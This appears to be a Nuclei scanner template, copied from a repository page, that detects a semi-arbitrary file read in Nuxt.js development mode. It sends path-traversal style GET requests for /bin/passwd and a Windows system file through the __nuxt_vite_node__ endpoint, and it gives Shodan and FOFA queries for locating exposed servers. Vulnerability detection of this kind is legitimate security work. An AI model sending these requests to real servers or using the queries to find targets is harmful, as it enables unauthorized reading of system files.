39 lines
1.2 KiB
YAML
39 lines
1.2 KiB
YAML
id: nuxt-js-semi-lfi
|
|
|
|
info:
|
|
name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: Arbitrary File Read in Dev Mode in Nuxt.js
|
|
reference:
|
|
- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
|
|
- https://bryces.io/blog/nuxt3
|
|
- https://twitter.com/fofabot/status/1669339995780558849
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
shodan-query: html:"buildAssetsDir" "nuxt"
|
|
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
|
tags: huntr,lfi,nuxtjs
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"plugin":'
|
|
- '"pluginCode":'
|
|
- '"id":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950 |